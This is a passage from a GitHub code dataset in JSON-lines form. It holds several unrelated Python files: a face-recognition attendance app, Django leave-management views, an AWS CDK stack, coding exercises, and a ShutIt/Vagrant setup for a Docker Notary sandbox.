interface in interfaces():\n links = ifaddresses(interface).get(AF_INET, [])\n for link in links:\n addr = ip_address(link[\"addr\"])\n if not addr.is_loopback:\n result.append(addr)\n return result\n\n\ndef main():\n port = 5000\n addresses = ipv4_addresses()\n assert len(addresses) > 0\n print(\"OPEN MANOKEE IN A BROWSER AT:\")\n for address in addresses:\n url = f\"http://{address}:{port}/\"\n print(url)\n qr = qrcode.QRCode()\n qr.add_data(url)\n qr.print_ascii()\n web.run_app(app, port=port, access_log=logging.getLogger(\"webserver\"))\n","repo_name":"smiszym/manokee","sub_path":"manokee/entrypoint.py","file_name":"entrypoint.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"21083386926","text":"import requests\nimport time\nimport re\n\nurl = 'http://comet.blog.sina.com.cn/api?maintype=hits&act=4&aid=5c47219b01011oox&ref=http%3A%2F%2Fblog.sina.com.cn%2Fu%2F1548165531&varname=requestId_63901005'\nheaders = {\n 'Referer': 'http://blog.sina.com.cn/u/5874775575'\n}\n\nwhile True:\n wb_date = requests.get(url, headers=headers)\n a = wb_date.text.split('=')[-1]\n a = int(re.findall('\\d{1,10}', a)[0])\n time.sleep(10)\n wb_date = requests.get(url, headers=headers)\n b = wb_date.text.split('=')[-1]\n b = int(re.findall('\\d{1,10}', b)[0])\n print((b - a) * 6 * 60)\n","repo_name":"meta-tabchen/Python-In-Action","sub_path":"新浪博客/count001.py","file_name":"count001.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15454556617","text":"from sqlite3 import connect\nfrom imutils import face_utils\nimport dlib\nimport cv2\nfrom face_recognition import load_image_file, face_encodings, compare_faces\nfrom tkinter import *\nimport os\nimport cv2\nfrom tkinter import filedialog\nfrom PIL import ImageTk,Image\nimport tkinter\nimport numpy as np\nfrom scipy import spatial\ndef read_data_from_db():\n\tdb_loc = r'C:\\Users\\ELCOT\\Documents\\Chandru\\Git_Bash\\Attendance_system_using_facial_recognition\\CODE\\final\\db\\STUDENTSDATA.db'\n\t#print ('studentsdata Database opened')\n\tconn = connect(db_loc)\n\tcurser = conn.cursor()\n\tcommand = '''SELECT * FROM students_record '''\n\tdata = curser.execute(command)\n\tres_list = []\n\ttemp_lis = []\n\ttemp_encoding = []\n\tfor record in data:\n\t\ttemp_lis = list(record[0:2])\n\t\ttemp_encoding = record[2:]\n\t\ttemp_lis.append(np.asarray(temp_encoding))\n\t\tres_list.append(tuple(temp_lis))\n\tconn.close()\n\tres = tuple(res_list)\n\treturn (res)\n\ndef find_faces_in_img(img_loc):\n\t# initialize dlib's face detector (HOG-based) and then create\n\t# the facial landmark predictor\n\tdetector = dlib.get_frontal_face_detector()\n\t# load the input image and convert it to grayscale\n\timage = cv2.imread(img_loc)\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\t#frame = imutils.resize(frame, width=450)\n\t# detect faces in the grayscale image\n\trects = detector(gray, 0)\n\tencoding_in_class_lis = []\n\t# loop over the face detections\n\tfor (i, rect) in enumerate(rects):\n\t\t# determine the facial landmarks for the face region, then\n\t\t# convert the facial landmark (x, y)-coordinates to a NumPy\n\t\t# array\n\t\t# Start coordinate, here (5, 5) \n\t\t# represents the top left corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.left())\n\t\tlis.append(rect.top())\n\t\tstart_point = tuple(map(int, lis))\n\t\t# Ending coordinate, here (220, 220) 
\n\t\t# represents the bottom right corner of rectangle \n\t\tlis = []\n\t\tlis.append(rect.right())\n\t\tlis.append(rect.bottom())\n\t\tend_point = tuple(map(int, lis))\n\t\t# # Blue color in BGR \n\t\t# color = (255, 0, 0) \n\t\t# # Line thickness of 2 px \n\t\t# thickness = 2\n\t\tcrop_img = image[start_point[1]:end_point[1], start_point[0]:end_point[0]]\n\t\tcv2.imwrite(r'C:\\Users\\ELCOT\\Documents\\Cls{}.jpg'.format(i), crop_img)\n\t\tencoding = face_encodings(crop_img)[0]\n\t\tencoding_in_class_lis.append(encoding)\n\tencoding_in_class = tuple(encoding_in_class_lis)\n\treturn (encoding_in_class)\n\ndef compare_2_faces(known_encoding, unknown_encoding):\n\t# known encoding will be register images that is already in the db\n\t# unknown encoding will be the image taken \n\t# result = 1 - spatial.distance.cosine(known_encoding, unknown_encoding)\n\t# print(result)\n\t# return (result)\n\tres = compare_faces([known_encoding], unknown_encoding, tolerance=0.5)[0]\n\t#print(res)\n\treturn (res)\n\ndef compare_in_db(encoding_in_class, encoding_in_db):\n\tfor i in encoding_in_class:\n\t\tfor j in encoding_in_db:\n\t\t\tif (compare_2_faces(j[2], i)):\n\t\t\t\tprint(j[0])\n\t\t\t\tprint(j[1])\n\t\t\t\tbreak\n\ndef browse():\n global filename\n \n \n filename = filedialog.askopenfilename(initialdir = \"/\",\n title = \"Select a File\",\n filetypes = ((\"all files\",\n \"*.*\"),\n (\"Text files\",\n \"*.txt*\")))\n\n \n\n label_file_explorer = Label(\n text = \"File Explorer using Tkinter\",\n width = 100, height = 4,\n fg = \"blue\")\n\n label_file_explorer.configure(text=\"File Opened: \"+filename)\n Label(screen,text = filename).place(x=150,y=100)\n\n button_exit = Button(\n text = \"Exit\",\n command = exit)\n\ndef send_data():\n\timg_loc = filename\n\tencoding_in_class = find_faces_in_img(img_loc)\n\tencoding_in_db = read_data_from_db()\n\tcompare_in_db(encoding_in_class, encoding_in_db)\n\ndef main_screen():\n\tglobal screen\n\tscreen = Tk()\n\tscreen.geometry(\"400x350\")\n\tscreen.title(\"Register\")\n\tglobal userid\n\tglobal stdname\n\tglobal path\n\tglobal registerid\n\tglobal studentname\n\tglobal filepath\n\tuserid=StringVar()\n\tstdname=StringVar()\n\tpath=StringVar()\n\tLabel(screen,text=\"Browse Image to mark attendance \").place(x=100,y=50)\n\tLabel(screen,text=\"\").pack()\n\tLabel(screen,text = \"Choose Image:\").place(x=50,y=100)\n\tButton(screen,text = \"Browse\",width=\"15\", command = browse).place(x=150,y=150)\n\tButton(screen,text = \"submit\",width=\"15\", command = send_data).place(x=150,y=200)\n\tscreen.mainloop()\n\nif __name__ == \"__main__\":\n\tmain_screen()","repo_name":"KabilChakravarthy/Face_Recognition_Attendance_System","sub_path":"CODE/final/face_attend_2.py","file_name":"face_attend_2.py","file_ext":"py","file_size_in_byte":4588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23994749870","text":"\nimport datetime\nfrom datetime import date\nfrom leave.models import Leave, LeaveSummary\nfrom mysite.share.views import getUsername, handleInput, urlResponse, verifyAndGenNewToken, sessionExpiredResponse, wrongParameterResponse\n\ndef leaveSummary(request):\n authorization = verifyAndGenNewToken(request.headers['Authorization'])\n if authorization == '':\n return sessionExpiredResponse()\n username = getUsername(authorization)\n if username is None:\n return wrongParameterResponse()\n leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0)\n return urlResponse({'data': 
[LeaveSummary.deserialize(ls) for ls in leaveSummary]}, 200, authorization)\n\ndef leaveComing(request):\n    authorization = verifyAndGenNewToken(request.headers['Authorization'])\n    if authorization == '':\n        return sessionExpiredResponse()\n    username = getUsername(authorization)\n    if username is None:\n        return wrongParameterResponse()\n    leave = Leave.objects.filter(username=username, leave_date__gte=date.today(), rejected_remark='', is_deleted=0).exclude(approved_by='').order_by('leave_date')\n    return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leavePending(request):\n    authorization = verifyAndGenNewToken(request.headers['Authorization'])\n    if authorization == '':\n        return sessionExpiredResponse()\n    username = getUsername(authorization)\n    if username is None:\n        return wrongParameterResponse()\n    leave = Leave.objects.filter(username=username, approved_by='', rejected_remark='', is_deleted=0).order_by('leave_date')\n    return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveHistory(request):\n    authorization = verifyAndGenNewToken(request.headers['Authorization'])\n    if authorization == '':\n        return sessionExpiredResponse()\n    username = getUsername(authorization)\n    if username is None:\n        return wrongParameterResponse()\n    leave = Leave.objects.filter(username=username, leave_date__lt=date.today(), is_deleted=0).exclude(approved_by='').order_by('-leave_date')\n    return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef leaveApproval(request):\n    authorization = verifyAndGenNewToken(request.headers['Authorization'])\n    if authorization == '':\n        return sessionExpiredResponse()\n    username = handleInput(request, ['username'], 'GET')\n    if username is None:\n        return wrongParameterResponse()\n    leave = Leave.objects.filter(approver=username, approved_by='', is_deleted=0).order_by('-leave_date')\n    return urlResponse({'data': [Leave.deserialize(l) for l in leave]}, 200, authorization)\n\ndef applyLeave(request):\n    authorization = verifyAndGenNewToken(request.headers['Authorization'])\n    if authorization == '':\n        return sessionExpiredResponse()\n    username = getUsername(authorization)\n    leave_type, leave_from, fromTime, leave_to, toTime, approver, attachment, remark = handleInput(request, \n        ['leave_type', 'from', 'fromTime', 'to', 'toTime', 'approver', 'attachment', 'remark'], 'POST')\n    # split the ISO-style 'YYYY-MM-DDThh:mm' strings into integer components before building datetimes\n    leaveFrom = leave_from.split('T')[0].split('-')\n    startDate = datetime.datetime(int(leaveFrom[0]), int(leaveFrom[1]), int(leaveFrom[2]), 0, 0)\n    leaveTo = leave_to.split('T')[0].split('-')\n    endDate = datetime.datetime(int(leaveTo[0]), int(leaveTo[1]), int(leaveTo[2]), 0, 0)\n    delta = datetime.timedelta(days=1)\n    numberOfLeaveTaken = 0\n    while (startDate <= endDate):\n        newLeave = dict()\n        newLeave['created_by'] = username\n        newLeave['updated_by'] = username\n        newLeave['username'] = username\n        newLeave['leave_type'] = leave_type\n        newLeave['leave_date'] = startDate\n        newLeave['approver'] = approver\n        newLeave['attachment'] = attachment\n        newLeave['remark'] = remark\n        if numberOfLeaveTaken == 0:\n            if len(fromTime) > 0:\n                newLeave['leave_date_time'] = fromTime\n                numberOfLeaveTaken -= 0.5\n        if startDate == endDate:\n            if len(toTime) > 0:\n                newLeave['leave_date_time'] = toTime\n                numberOfLeaveTaken -= 0.5\n        startDate += delta\n        numberOfLeaveTaken += 1\n        newLeaveRecord = Leave()\n        newLeaveRecord.saveNew(newLeave)\n    leaveSummary = LeaveSummary.objects.filter(username=username, is_deleted=0, leave_type=leave_type).first()\n    leaveSummary.leave_balance -= numberOfLeaveTaken\n    
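# NOTE: decrementing leave_balance in Python and then saving is a read-modify-write and can race\n    # under concurrent requests; Django's F() expressions would make it atomic, e.g. (sketch, not this project's code):\n    #   from django.db.models import F\n    #   LeaveSummary.objects.filter(pk=leaveSummary.pk).update(leave_balance=F('leave_balance') - numberOfLeaveTaken)\n    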
leaveSummary.save()\n    return urlResponse({'message': 'Data successfully added!'}, 200, authorization)","repo_name":"Justaway97/back-end-template","sub_path":"mysite/leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33059350465","text":"from aws_cdk import (\n    Environment,\n    RemovalPolicy,\n    Stage,\n    Duration,\n    Stack,\n    pipelines as cdkpipe,\n    aws_codepipeline as pipe,\n    aws_sqs as sqs,\n    aws_s3 as s3\n)\nfrom constructs import Construct\nimport random, string\n\n\ndef generate_random_string(length):\n    characters = string.ascii_letters + string.digits\n    random_string = ''.join(random.choice(characters) for _ in range(length))\n    return random_string\n\nrandom_string = generate_random_string(10)\n\nclass ResourceEuropeStack(Stack):\n\n    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n        super().__init__(scope, construct_id, **kwargs)\n\n        queue = sqs.Queue(\n            self, \"MyEuropeanQueue\",\n            visibility_timeout=Duration.seconds(300),\n        )\n        bucket = s3.Bucket(self, \"myEuropeanBucket\", \n            bucket_name=f\"my-european-bucket-{random_string.lower()}\",\n            versioned=True,\n            block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n            auto_delete_objects=True,\n            removal_policy=RemovalPolicy.DESTROY\n        )\n    \nclass DeployEuropeStage(Stage):\n    def __init__(self, scope: Construct, construct_id: str, env: Environment, **kwargs) -> None:\n        super().__init__(scope, construct_id, **kwargs)\n\n        ResourceEuropeStack(self, 'ResourceStack', env=env, stack_name='test-stack-in-EUROPE')\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/europe_resources.py","file_name":"europe_resources.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1132098238","text":"# My solution\n# Submit the largest number you can make by redefining operator precedence (+,-,*); take the absolute value\n# Put the operators in a list, filter out duplicates, then fix a precedence\n# Between identical operators, the one that comes first has the higher precedence\n# Use eval() to evaluate the string expression\nimport math\nfrom itertools import permutations\ndef solution(ex):\n    res = []  # list holding the string split on the operators\n    ans = []  # list of the values obtainable for each precedence ordering\n    k = [\"-\",\"+\",\"*\"]\n    _k = [i for i in ex if i in k]\n    l = [(i,j) for i,j in enumerate(ex) if j in k]  # store the index and value of every -, +, *\n    dup = list(set(_k))\n    \n    # split the expression and store the pieces\n    for i in range(len(l)):\n        if i == 0:\n            b = l[0][0]\n            print(b)\n            res.append(ex[:b])\n            res.append(ex[b])\n        else:\n            a = b + 1 # start\n            b = l[i][0] # end\n            res.append(ex[a:b])\n            res.append(ex[b])\n    res.append(ex[b+1:])\n    print(res)\n    \n    p = list(permutations(dup,len(dup)))  # precedence orderings\n    print(p)\n    \n    # evaluate according to each precedence ordering\n    for i in range(len(p)):  # iterate over the precedence orderings\n        arr = res[:]\n        for j in range(len(dup)):  # iterate over the operators by priority (1,2,3)\n            x = arr.count(p[i][j])\n            for _ in range(x):  # if the same operator occurs several times, repeat once per occurrence\n                r = arr.index(p[i][j])\n                arr[r-1] = str(eval(arr[r-1]+arr[r]+arr[r+1]))  # evaluate with the operator and store the value back in the list\n                del arr[r] \n                del arr[r]\n        print(arr)\n        ans.append(abs(int(arr[0])))\n    # print(ans)\n    # print(p) \n    return int(max(ans))\n\n\n    \n# A better solution\n# Uses regular expressions\nimport re\nfrom itertools import permutations\n\ndef solution(expression):\n    #1\n    op = [x for x in ['*','+','-'] if x in expression]\n    op = [list(y) for y in permutations(op)]\n    ex = re.split(r'(\\D)',expression)\n\n    #2\n    a = []\n    for x in op:\n        _ex = ex[:]\n        for y in x:\n            while y in _ex:\n                tmp = _ex.index(y)\n                _ex[tmp-1] = str(eval(_ex[tmp-1]+_ex[tmp]+_ex[tmp+1]))  # same approach as mine\n                _ex = 
_ex[:tmp]+_ex[tmp+2:]  # slicing instead of removing with del\n        a.append(_ex[-1])\n\n    #3\n    return max(abs(int(x)) for x in a)","repo_name":"yeye921/algorithm-study","sub_path":"Level2/maximize_formula.py","file_name":"maximize_formula.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30317742726","text":"# Write a program that finds the position of the second occurrence of a string in a list, or reports that there is none.\n# *Example:*\n# - list: [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"], looking for: \"qwe\", answer: 3\n# - list: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"], looking for: \"йцу\", answer: 5\n# - list: [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\"], looking for: \"йцу\", answer: -1\n# - list: [\"123\", \"234\", 123, \"567\"], looking for: \"123\", answer: -1\n# - list: [], looking for: \"123\", answer: -1\n\n# my_list = [\"123\", \"234\", 123, '567']\n# print(my_list)\n\n# string_find = \"123\"\n# count = 0\n# for i in range(len(my_list)):\n#     if string_find == my_list[i]:\n#         count += 1\n#         if count == 2:\n#             print(i)\n# else:\n#     print(-1)\n\nmy_list = [\"йцу\", \"фыв\", \"ячс\", \"цук\", \"йцукен\", \"йцу\"]\nmy_str = input('Введите строку')\n\nif my_list.count(my_str) > 1:\n    first_index = my_list.index(my_str)\n    print(my_list.index(my_str, first_index + 1))\nelse:\n    print(-1)\n\n# Improved version:\n\nfrom typing import List \n\ndef find_second_entry(str_list: List[str], search_word: str):\n    try:\n        return [i for i, elem in enumerate(str_list) if elem == search_word][1]\n    except IndexError:\n        return -1","repo_name":"dvsni/Python","sub_path":"Task #6.5.py","file_name":"Task #6.5.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20310603720","text":"import random\nimport string\n\nfrom shutit_module import ShutItModule\n\nclass shutit_notary_trust_sandbox(ShutItModule):\n\n\n\tdef build(self, shutit):\n\t\tvagrant_image = shutit.cfg[self.module_id]['vagrant_image']\n\t\tvagrant_provider = shutit.cfg[self.module_id]['vagrant_provider']\n\t\tgui = shutit.cfg[self.module_id]['gui']\n\t\tmemory = shutit.cfg[self.module_id]['memory']\n\t\tmodule_name = 'shutit_notary_trust_sandbox_' + ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(6))\n\t\tshutit.send('rm -rf /tmp/' + module_name + ' && mkdir -p /tmp/' + module_name + ' && cd /tmp/' + module_name)\n\t\tshutit.send('vagrant init ' + vagrant_image)\n\t\tshutit.send_file('/tmp/' + module_name + '/Vagrantfile','''\nVagrant.configure(2) do |config|\n  config.vm.box = \"''' + vagrant_image + '''\"\n  # config.vm.box_check_update = false\n  # config.vm.network \"forwarded_port\", guest: 80, host: 8080\n  # config.vm.network \"private_network\", ip: \"192.168.33.10\"\n  # config.vm.network \"public_network\"\n  # config.vm.synced_folder \"../data\", \"/vagrant_data\"\n  config.vm.provider \"virtualbox\" do |vb|\n    vb.gui = ''' + gui + '''\n    vb.memory = \"''' + memory + '''\"\n    vb.name = \"shutit_notary_trust_sandbox\"\n  end\nend''')\n\t\tshutit.send('vagrant up --provider virtualbox',timeout=99999)\n\t\tshutit.login(command='vagrant ssh')\n\t\tshutit.login(command='sudo su -',password='vagrant')\n\t\tshutit.install('apt-transport-https')\n\t\tshutit.install('ca-certificates') \n\t\tshutit.send('apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D')\n\t\tshutit.send('touch 
/etc/apt/sources.list.d/docker.list')\n\t\tshutit.send('''cat > /etc/apt/sources.list.d/docker.list << END\ndeb https://apt.dockerproject.org/repo ubuntu-trusty main\nEND''')\n\t\tshutit.send('apt update -y')\n\t\tshutit.send('apt-cache policy docker-engine')\n\t\tshutit.install('docker-engine')\n\t\tshutit.send('curl -L https://github.com/docker/compose/releases/download/1.8.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose')\n\t\tshutit.send('chmod +x /usr/local/bin/docker-compose')\n\t\tshutit.send('''cat > docker-compose.yml << END\nversion: \"2\"\nservices:\n  notaryserver:\n    image: dockersecurity/notary_autobuilds:server-v0.3.0\n    volumes:\n      - notarycerts:/go/src/github.com/docker/notary/fixtures\n    networks:\n      - sandbox\n    environment:\n      - NOTARY_SERVER_STORAGE_TYPE=memory\n      - NOTARY_SERVER_TRUST_SERVICE_TYPE=local\n  sandboxregistry:\n    image: registry:2.4.1\n    networks:\n      - sandbox\n    container_name: sandboxregistry\n  trustsandbox:\n    image: docker:dind\n    networks:\n      - sandbox\n    volumes:\n      - notarycerts:/notarycerts\n    privileged: true\n    container_name: trustsandbox\n    entrypoint: \"\"\n    command: |-\n        sh -c '\n            cp /notarycerts/root-ca.crt /usr/local/share/ca-certificates/root-ca.crt &&\n            update-ca-certificates &&\n            dockerd-entrypoint.sh --insecure-registry sandboxregistry:5000'\nvolumes:\n  notarycerts:\n    external: false\nnetworks:\n  sandbox:\n    external: false\nEND''')\n\t\tshutit.send('docker-compose up -d')\n\t\tshutit.login('docker exec -it trustsandbox sh')\n\t\tshutit.pause_point('')\n\t\tshutit.send('docker pull docker/trusttest')\n\t\tshutit.send('docker tag docker/trusttest sandboxregistry:5000/test/trusttest:latest')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST=1')\n\t\tshutit.send('export DOCKER_CONTENT_TRUST_SERVER=https://notaryserver:4443')\n\t\tshutit.send('docker pull sandboxregistry:5000/test/trusttest')\n\t\tshutit.logout()\n\t\tshutit.send('docker logs trustsandbox')\n\t\tshutit.pause_point('')\n\n\n\t\tshutit.logout()\n\t\tshutit.logout()\n\t\treturn True\n\n\tdef get_config(self, shutit):\n\t\tshutit.get_config(self.module_id,'vagrant_image',default='ubuntu/trusty64')\n\t\tshutit.get_config(self.module_id,'vagrant_provider',default='virtualbox')\n\t\tshutit.get_config(self.module_id,'gui',default='false')\n\t\tshutit.get_config(self.module_id,'memory',default='1024')\n\n\t\treturn True\n\n\tdef test(self, shutit):\n\n\t\treturn True\n\n\tdef finalize(self, shutit):\n\n\t\treturn True\n\n\tdef isinstalled(self, shutit):\n\n\t\treturn False\n\n\tdef start(self, shutit):\n\n\t\treturn True\n\n\tdef stop(self, shutit):\n\n\t\treturn True\n\ndef module():\n\treturn shutit_notary_trust_sandbox(\n\t\t'imiell.shutit_notary_trust_sandbox.shutit_notary_trust_sandbox', 1243692531.0001, \n\t\tdescription='',\n\t\tmaintainer='',\n\t\tdelivery_methods=['bash'],\n\t\tdepends=['shutit.tk.setup','shutit-library.virtualbox.virtualbox.virtualbox','tk.shutit.vagrant.vagrant.vagrant']\n\t)\n","repo_name":"ianmiell/shutit-notary-trust-sandbox","sub_path":"shutit_notary_trust_sandbox.py","file_name":"shutit_notary_trust_sandbox.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24769558476","text":"import numpy as np\nsize = int(input(\"Enter the size of array:: \"))\narr = np.random.randint(1,1000,size=size)\n#np.set_printoptions(threshold=np.inf)\nprint(\"Original array::\",arr)\ndef selection_desc(array):\n    i= 0\n    while i<size-1:\n        max_index = i\n        j = i+1\n        while j<size:\n            if array[j]>array[max_index]:\n                max_index = j\n            j+=1\n        
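# the inner scan above leaves max_index pointing at the largest element of array[i:], so it is swapped into slot i\n        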
swap(array,i,max_index)\n i+=1\ndef swap(array,num,num2):\n array[num],array[num2] = array[num2],array[num]\nnp.set_printoptions(threshold=np.inf)\nselection_desc(arr)\nprint(\"Sorted descending array::\",arr)\n","repo_name":"ypradhan222/mtech_code","sub_path":"ALgorithms/selection_desc.py","file_name":"selection_desc.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15862247720","text":"import os\nimport collections\nimport dendropy\nfrom sisterbayes import model\n\nclass SisterBayesSummaryStatsCalculator(object):\n\n def __init__(self, **kwargs):\n self.output_prefix = kwargs.pop(\"output_prefix\", \"sisterbayes\")\n self.is_unfolded_site_frequency_spectrum = kwargs.pop(\"is_unfolded_site_frequency_spectrum\", False)\n self.is_calculate_single_population_sfs = kwargs.pop(\"is_calculate_single_population_sfs\", False)\n self.is_calculate_joint_population_sfs = kwargs.pop(\"is_calculate_joint_population_sfs\", True)\n self.stat_label_prefix = kwargs.pop(\"stat_label_prefix\", \"stat\")\n self.supplemental_labels = kwargs.pop(\"supplemental_labels\", None)\n self.alignment_directory_head = kwargs.pop(\"alignment_directory_head\", None)\n self.field_delimiter = kwargs.pop(\"field_delimiter\", \"\\t\")\n self.is_concatenate_loci = kwargs.pop(\"is_concatenate_loci\", False)\n self.concatenated_locus_label = kwargs.pop(\"concatenated_locus_label\", None)\n self.is_normalize = kwargs.pop(\"is_normalize\", False)\n locus_info = kwargs.pop(\"locus_info\", None)\n params = kwargs.pop(\"params\", None) # ignore\n if locus_info:\n self.model = model.SisterBayesModel(params_d=None, locus_info=locus_info,)\n else:\n self.model = None\n if kwargs:\n raise Exception(\"Unrecognized configuration entries: {}\".format(kwargs))\n self.default_state_alphabet = dendropy.new_standard_state_alphabet(\"0123456789ACGTU\", case_sensitive=False)\n\n def read_data(self, filepath, datatype, schema, taxon_namespace=None):\n if not os.path.isabs(filepath) and self.alignment_directory_head is not None:\n filepath = os.path.join(self.alignment_directory_head, filepath)\n if datatype == \"dna\":\n data = dendropy.DnaCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace)\n elif datatype == \"standard\" or datatype == \"snp\":\n data = dendropy.StandardCharacterMatrix.get(\n path=filepath,\n schema=schema,\n taxon_namespace=taxon_namespace,\n default_state_alphabet=self.default_state_alphabet)\n return data\n\n def _process_sequences(\n self,\n results_d,\n field_name_prefix,\n sequences,\n num_genes_deme0,\n num_genes_deme1,\n nsites):\n d0_sequences = sequences[:num_genes_deme0]\n d1_sequences = sequences[num_genes_deme0:]\n assert len(d0_sequences) == num_genes_deme0\n assert len(d1_sequences) == num_genes_deme1\n assert len(sequences) == num_genes_deme0 + num_genes_deme1\n jsfs = self.folded_joint_site_frequency_spectrum(\n d0_sequences=d0_sequences,\n d1_sequences=d1_sequences,)\n for row_idx in range(len(jsfs)):\n for col_idx in range(len(jsfs[row_idx])):\n raw_count = float(jsfs[row_idx][col_idx])\n if self.is_normalize:\n result_value = float(raw_count) / nsites\n else:\n result_value = raw_count\n results_d[\"{}.{}.{}\".format(field_name_prefix, row_idx, col_idx)] = result_value\n\n def write_summary_stats(self,\n dest=None,\n results_store=None,\n is_write_header=True,\n ):\n results_d = collections.OrderedDict()\n if self.supplemental_labels:\n for key in 
self.supplemental_labels:\n results_d[key] = self.supplemental_labels[key]\n for lineage_pair_idx, lineage_pair in enumerate(self.model.lineage_pairs):\n if self.is_concatenate_loci:\n if self.concatenated_locus_label:\n concatenated_locus_label = self.concatenated_locus_label\n else:\n concatenated_locus_label = model.compose_concatenated_locus_label(lineage_pair)\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n concatenated_locus_label,\n )\n num_genes_deme0 = None\n num_genes_deme1 = None\n nsites = 0\n master_data = dendropy.StandardCharacterMatrix(default_state_alphabet=self.default_state_alphabet)\n for locus_idx, locus_definition in enumerate(lineage_pair.locus_definitions):\n if num_genes_deme0 is None:\n num_genes_deme0 = locus_definition.num_genes_deme0\n num_genes_deme1 = locus_definition.num_genes_deme1\n else:\n if (num_genes_deme0 != locus_definition.num_genes_deme0) or (num_genes_deme0 != locus_definition.num_genes_deme0):\n raise ValueError(\"Cannot concatenate loci if number of samples per deme vary across loci\")\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\",\n taxon_namespace=master_data.taxon_namespace)\n nsites += locus_definition.num_sites\n master_data.extend_sequences(data, is_add_new_sequences=True)\n sequences = master_data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=num_genes_deme0,\n num_genes_deme1=num_genes_deme1,\n nsites=nsites,\n )\n else:\n for locus_definition in lineage_pair.locus_definitions:\n field_name_prefix=\"{}.{}.{}.joint.sfs\".format(\n self.stat_label_prefix,\n lineage_pair.label,\n locus_definition.locus_label)\n data = self.read_data(\n filepath=locus_definition.alignment_filepath,\n datatype=\"standard\",\n schema=\"fasta\")\n sequences = data.sequences()\n self._process_sequences(\n results_d,\n field_name_prefix,\n sequences=sequences,\n num_genes_deme0=locus_definition.num_genes_deme0,\n num_genes_deme1=locus_definition.num_genes_deme1,\n nsites=locus_definition.num_sites,\n )\n if is_write_header:\n dest.write(self.field_delimiter.join(results_d.keys()))\n dest.write(\"\\n\")\n dest.write(self.field_delimiter.join(\"{}\".format(v) for v in results_d.values()))\n dest.write(\"\\n\")\n return results_d\n\n def folded_joint_site_frequency_spectrum(self,\n d0_sequences,\n d1_sequences,\n is_discard_multiple_mutation_site=True):\n deme_sequences = (d0_sequences, d1_sequences)\n # weirdly, FastsimCoal2 puts first deme second axis, i.e. 
columns,\n # while second deme gets put on rows\n jsfs = [[0 for i in range(len(d0_sequences)+1)] for j in range(len(d1_sequences)+1)]\n num_demes = 2\n nsites = None\n deme_site_columns = []\n for deme_idx in range(num_demes):\n deme_sites = list(zip(*(s.symbols_as_list() for s in deme_sequences[deme_idx])))\n if nsites is None:\n nsites = len(deme_sites)\n else:\n assert len(deme_sites) == nsites\n deme_site_columns.append(deme_sites)\n for site_idx in range(len(deme_site_columns[0])):\n deme_counters = []\n pooled_counter = collections.Counter()\n for deme_idx in range(num_demes):\n deme_counter = collections.Counter(deme_site_columns[deme_idx][site_idx])\n deme_counters.append(deme_counter)\n pooled_counter.update(deme_counter)\n if len(pooled_counter) == 1:\n jsfs[0][0] += 1\n continue\n majority_allele = pooled_counter.most_common(1)[0][0]\n del pooled_counter[majority_allele]\n if is_discard_multiple_mutation_site and len(pooled_counter) > 1:\n continue\n for deme_idx in range(num_demes):\n del deme_counters[deme_idx][majority_allele]\n jsfs[sum(deme_counters[1].values())][sum(deme_counters[0].values())] += 1\n return jsfs\n","repo_name":"jeetsukumaran/SisterBayes","sub_path":"src/sisterbayes/sumstats.py","file_name":"sumstats.py","file_ext":"py","file_size_in_byte":8910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32888653739","text":"import uuid\nfrom io import BytesIO\n\nimport validators\nfrom lib.common.errhelper import ErrHelper\nfrom PIL import Image\nfrom pyvirtualdisplay import Display\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nOK = \"no current problems\"\nDOWN = \"reports indicate problems\"\nWARNING = \"indicate possible 